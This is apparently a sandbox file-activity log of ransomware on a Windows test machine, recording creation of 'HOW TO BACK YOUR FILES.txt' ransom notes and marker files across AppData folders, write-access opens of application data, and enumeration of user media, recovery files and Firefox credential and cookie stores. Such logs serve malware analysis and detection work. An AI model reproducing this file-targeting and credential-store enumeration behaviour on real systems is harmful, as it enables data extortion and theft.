Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\NativeCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Flash Player\AssetCache\G7ZD37Y5\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\JSCache\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Forms\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\Roaming\Adobe\Acrobat\DC\Collab\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\deployment.properties desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\FD1HVy\AppData\LocalLow\Sun\Java\Deployment\tmp\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create Directory C:\ProgramData\local - True 1
Fn
Create Directory C:\ProgramData\share - True 1
Fn
Get Info C:\WINDOWS\system32\cmd.exe type = file_attributes True 1
Fn
Get Info Z:\System Volume Information\tracking.log type = size, size_out = 20480 True 1
Fn
Get Info C:\BOOTNXT type = size, size_out = 1 True 1
Fn
Get Info C:\Windows10Upgrade\bootsect.exe type = size, size_out = 118472 True 1
Fn
Get Info Z:\Recovery\WindowsRE\boot.sdi type = size, size_out = 3170304 True 1
Fn
Get Info C:\Windows10Upgrade\DW20.EXE type = size, size_out = 643784 True 1
Fn
Get Info Z:\Recovery\WindowsRE\ReAgent.xml type = size, size_out = 1085 True 1
Fn
Get Info Z:\Recovery\WindowsRE\Winre.wim type = size, size_out = 491777489 True 1
Fn
Get Info C:\Windows10Upgrade\DWTRIG20.EXE type = size, size_out = 45768 True 1
Fn
Get Info C:\Windows10Upgrade\EnableWiFiTracing.cmd type = size, size_out = 9810 True 1
Fn
Get Info C:\Windows10Upgrade\GatherOSState.EXE type = size, size_out = 564936 True 1
Fn
Get Info C:\Windows10Upgrade\GetCurrentRollback.EXE type = size, size_out = 73416 True 1
Fn
Get Info C:\Windows10Upgrade\HttpHelper.exe type = size, size_out = 27848 True 1
Fn
Get Info C:\Windows10Upgrade\PostOOBEScript.cmd type = size, size_out = 577 True 1
Fn
Get Info C:\Windows10Upgrade\upgrader_default.log type = size, size_out = 250186 True 1
Fn
Get Info C:\Windows10Upgrade\upgrader_win10.log type = size, size_out = 20548 True 1
Fn
Get Info C:\Windows10Upgrade\Windows10UpgraderApp.exe type = size, size_out = 1415880 True 1
Fn
Get Info C:\Windows10Upgrade\WinREBootApp32.exe type = size, size_out = 25288 True 1
Fn
Get Info C:\Windows10Upgrade\WinREBootApp64.exe type = size, size_out = 25800 True 1
Fn
Get Info C:\Windows10Upgrade\resources\hwcompatShared.txt type = size, size_out = 825371 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\block.png type = size, size_out = 919 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\bluelogo.png type = size, size_out = 7080 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\bullet.png type = size, size_out = 221 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default.css type = size, size_out = 5767 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default.htm type = size, size_out = 62541 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default_eos.css type = size, size_out = 6700 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default_eos.htm type = size, size_out = 55866 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default_oobe.css type = size, size_out = 5224 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\default_oobe.htm type = size, size_out = 65710 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\eula.css type = size, size_out = 82 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\GetStarted.png type = size, size_out = 3824 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png type = size, size_out = 4067 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\loading.gif type = size, size_out = 17395 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\lock.png type = size, size_out = 3677 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\logo.png type = size, size_out = 2611 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\marketing.png type = size, size_out = 493 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht type = size, size_out = 622093 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png type = size, size_out = 2165 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png type = size, size_out = 2212 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\pass.png type = size, size_out = 1822 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js type = size, size_out = 1283526 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js type = size, size_out = 3046842 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css type = size, size_out = 40953 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css type = size, size_out = 269159 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm type = size, size_out = 110445 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm type = size, size_out = 253453 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm type = size, size_out = 83315 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm type = size, size_out = 65173 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm type = size, size_out = 70461 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm type = size, size_out = 239446 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm type = size, size_out = 58549 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm type = size, size_out = 58549 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm type = size, size_out = 69816 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm type = size, size_out = 69816 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm type = size, size_out = 63101 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm type = size, size_out = 70746 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm type = size, size_out = 69386 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm type = size, size_out = 69386 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm type = size, size_out = 864647 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm type = size, size_out = 64872 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm type = size, size_out = 84570 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm type = size, size_out = 69485 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm type = size, size_out = 210254 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm type = size, size_out = 634083 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm type = size, size_out = 76091 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm type = size, size_out = 83909 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm type = size, size_out = 67188 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm type = size, size_out = 67224 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm type = size, size_out = 81812 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm type = size, size_out = 68292 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm type = size, size_out = 71054 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm type = size, size_out = 78176 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm type = size, size_out = 283852 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm type = size, size_out = 81953 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm type = size, size_out = 66159 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm type = size, size_out = 75552 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm type = size, size_out = 70391 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm type = size, size_out = 254145 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm type = size, size_out = 75137 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm type = size, size_out = 266731 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm type = size, size_out = 126241 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm type = size, size_out = 147140 True 1
Fn
Get Info C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm type = size, size_out = 147140 True 1
Fn
Get Info C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml type = size, size_out = 93884 True 1
Fn
Get Info C:\Windows10Upgrade\resources\amd64\hwcompat.txt type = size, size_out = 73135 True 1
Fn
Get Info C:\Windows10Upgrade\resources\amd64\hwexclude.txt type = size, size_out = 2317 True 1
Fn
Get Info C:\Windows10Upgrade\resources\amd64\nxquery.cat type = size, size_out = 9910 True 1
Fn
Get Info C:\Windows10Upgrade\resources\amd64\nxquery.inf type = size, size_out = 1495 True 1
Fn
Get Info C:\Users\Public\Libraries\RecordedTV.library-ms type = size, size_out = 960 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf type = size, size_out = 1621 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi type = size, size_out = 72414 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 type = size, size_out = 82242 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv type = size, size_out = 26543 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi type = size, size_out = 22847 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv type = size, size_out = 99568 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv type = size, size_out = 57850 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 type = size, size_out = 62195 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv type = size, size_out = 38194 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf type = size, size_out = 93370 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv type = size, size_out = 93507 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf type = size, size_out = 11647 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv type = size, size_out = 76600 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi type = size, size_out = 2609 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv type = size, size_out = 57995 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv type = size, size_out = 43170 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi type = size, size_out = 41696 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi type = size, size_out = 27013 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 type = size, size_out = 36722 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi type = size, size_out = 52499 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv type = size, size_out = 56711 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv type = size, size_out = 71683 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv type = size, size_out = 75959 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv type = size, size_out = 50302 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv type = size, size_out = 69313 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 type = size, size_out = 56995 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv type = size, size_out = 3841 True 1
Fn
Get Info C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv type = size, size_out = 25334 True 1
Fn
Get Info C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms type = size, size_out = 855 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png type = size, size_out = 25423 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif type = size, size_out = 70439 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png type = size, size_out = 59965 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif type = size, size_out = 87141 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg type = size, size_out = 8316 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png type = size, size_out = 48398 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\C876_Q.gif type = size, size_out = 58820 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\ES -V29.bmp type = size, size_out = 49087 True 1
Fn
Get Info C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif type = size, size_out = 18813 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Skype\RootTools\roottools.conf type = size, size_out = 76 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addons.json type = size, size_out = 24 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\addonStartup.json.lz4 type = size, size_out = 657 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\blocklist.xml type = size, size_out = 280169 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cert8.db type = size, size_out = 65536 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\containers.json type = size, size_out = 809 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\content-prefs.sqlite type = size, size_out = 229376 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\cookies.sqlite type = size, size_out = 524288 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\extensions.json type = size, size_out = 10542 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite type = size, size_out = 5242880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-shm type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\favicons.sqlite-wal type = size, size_out = 590288 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\handlers.json type = size, size_out = 683 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\key3.db type = size, size_out = 16384 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\permissions.sqlite type = size, size_out = 98304 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite type = size, size_out = 5242880 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-shm type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\places.sqlite-wal type = size, size_out = 2131512 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\pluginreg.dat type = size, size_out = 461 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\prefs.js type = size, size_out = 8141 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\search.json.mozlz4 type = size, size_out = 14056 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\secmod.db type = size, size_out = 16384 True 1
Fn
Get Info C:\Users\FD1HVy\AppData\Roaming\Mozilla\Firefox\Profiles\w7cr0hor.default\sessionCheckpoints.json type = size, size_out = 288 True 1
Fn
